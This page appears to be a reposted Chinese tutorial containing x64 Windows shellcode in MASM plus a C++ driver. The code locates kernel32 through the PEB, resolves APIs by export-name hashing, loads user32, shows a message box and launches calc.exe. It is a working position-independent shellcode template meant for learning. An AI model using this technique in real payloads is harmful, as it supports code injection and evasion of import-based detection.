标签:rcx rsi rbx x64 mov rdx 计算器 ShellCode rax
Main.cpp
extern "C" void PopCalculator(); extern "C" void _INT3(); int main() { _INT3(); PopCalculator(); return 0; }
Code.asm
PopCalculator proto _INT3 proto ; Hash: ; ; WinExec : 0x1A22F51 ; LoadLibrary : 0x0C917432 ; MessageBoxA : 0x1E380A6A ; GetProcAddress : 0xBBAFDF85 .code _INT3 proc int 3 ret _INT3 endp PopCalculator proc sub rsp, 100h ; ; 获取Kernel32基址 ; mov rax, gs:[60h] ; PEB mov rax, [rax+18h] ; Ldr mov rax, [rax+30h] ; InInitializationOrderModuleList _kernel32: mov rsi, [rax+10h] ; DllBase mov rbx, [rax+40h] ; BaseDllName mov rax, [rax] cmp dword ptr [rbx+0Ch], 00320033h jnz _kernel32 ; ; Call LoadLibrary ; mov rcx, rsi mov rdx, 0C917432h call FindApi mov r14, rax mov rbx, 6C6Ch push rbx mov rbx, 642E323372657375h push rbx mov rcx, rsp sub rsp, 18h ; 预留函数参数空间 call r14 mov rbx, rax ; ; Call MessageBoxA ; mov rcx, rbx mov rdx, 1E380A6Ah call FindApi mov r14, rax xor r9, r9 xor r8, r8 xor rdx, rdx xor rcx, rcx call r14 ; ; Call WinExec ; mov rcx, rsi mov rdx, 1A22F51h call FindApi mov r14, rax xor rax, rax push rax mov rax, 6578652e636c6163h push rax mov rcx, rsp sub rsp, 20h ; 预留函数参数空间 mov rdx, 1 call r14 ; ; Call ExitThread ; mov rcx, rsi mov rdx, 3148865413 call FindApi mov r14, rax mov rax, 006461h push rax mov rax, 6572685474697845h push rax mov rcx, rsi mov rdx, rsp sub rsp, 20h ; 预留函数参数空间 call r14 ; GetProcAddress mov r14, rax add rsp, 188h sub rsp, 18h ; 预留函数参数空间 xor rcx, rcx call r14 ; ExitThread ret FindApi: ; ; rcx - DLL 基址 ; rdx - 函数 Hash 值 ; sub rsp, 40h push rsi mov rdi, rdx mov rbx, rcx mov rsi, [rbx+3Ch] mov rax, rsi shl rax, 54 shr rax, 54 mov rsi, [rbx+rax+88h] ; rsi = Export Table RVA shl rsi, 32 shr rsi, 32 add rsi, rbx ; rsi = the base of Export Table push rsi mov esi, [rsi+20h] ; esi = RVA of AddressOfNames add rsi, rbx ; rsi = VA of AddressOfNames xor rcx, rcx dec ecx find_loop: inc ecx ; ecx = index of array lods dword ptr [rsi] add rax, rbx ; rax = the base of a function string xor edx, edx hash_loop: cmp byte ptr [rax], 0 je isEqual ror edx, 7 push rcx movsx ecx, byte ptr [rax] add edx, ecx ; edx = one of function's hashes pop rcx inc rax jmp hash_loop isEqual: cmp edx, edi jnz find_loop pop rsi ; rsi = the base of Export Table mov edx, [rsi+24h] ; edx = RVA of AddressOfNameOrdinals add rdx, rbx ; rdx = VA of AddressOfNameOrdinals movsx ecx, word ptr [rdx+rcx*2] ; ecx = the index of AddressOfFunctions mov edx, [rsi+1Ch] ; edx = RVA of AddressOfFunctions add rdx, rbx ; rdx = VA of AddressOfFunctions mov eax, [rdx+rcx*4] ; eax = the RVA of base of function add rax, rbx ; rax = the VA of base of function pop rsi add rsp, 40h ret PopCalculator endp end
标签:rcx,rsi,rbx,x64,mov,rdx,计算器,ShellCode,rax 来源: https://www.cnblogs.com/SuperGreen/p/16297129.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。